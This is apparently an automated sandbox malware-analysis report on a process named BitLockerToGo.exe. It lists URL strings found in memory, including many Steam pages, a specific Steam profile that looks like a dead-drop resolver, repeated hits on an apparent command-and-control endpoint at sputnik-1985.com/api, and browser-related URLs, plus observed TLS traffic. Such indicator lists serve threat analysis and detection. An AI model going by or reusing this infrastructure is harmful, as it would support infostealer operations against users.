                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reporti
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.cssI
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/cssK
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.i
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatiy
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/-
                Source: BitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/8=lw
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
                Source: BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api3
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apie
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiobH
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apip
                Source: BitLockerToGo.exe, 00000004.00000003.2857839635.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859511619.00000000031A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apitvo
                Source: BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/e
                Source: BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/m
                Source: BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/;
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: BitLockerToGo.exe, 00000004.00000003.2762810768.000000000312A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859436926.0000000003197000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2800972675.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49720 version: TLS 1.2
